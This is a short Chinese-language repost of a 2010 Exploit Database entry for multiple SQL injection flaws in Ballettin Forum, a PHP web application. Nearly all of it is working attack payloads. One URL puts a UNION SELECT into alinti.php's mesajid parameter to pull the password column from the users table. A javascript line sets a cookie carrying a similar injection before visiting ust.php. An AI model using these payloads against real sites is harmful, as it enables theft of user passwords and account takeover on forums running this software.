Ballettin Forum – SQL Injection

• Exploit Database
• 36 阅读

• 作者： 3v0
  日期： 2010-07-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14470/

• ====================================================================
  # Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability
  # Date: 25/07/2010
  # Author: 3v0 aka evolution <evolution ^ darkedition.com>
  # Software Link: http://www.ballettin.com
  # Tested on: Windows Xp Pack 3
  ====================================================================
  #1 - Vulnerable File
  ------------------------------------------------------
  [+] File: http://www.site.com/alinti.php?mesajid=[SQL]
  [+] Exploit: http://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1
  
  #2 - Insecure Cookie
  ------------------------------------------------------
  javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";
  After go to http://www.site.com/ust.php
  ====================================================================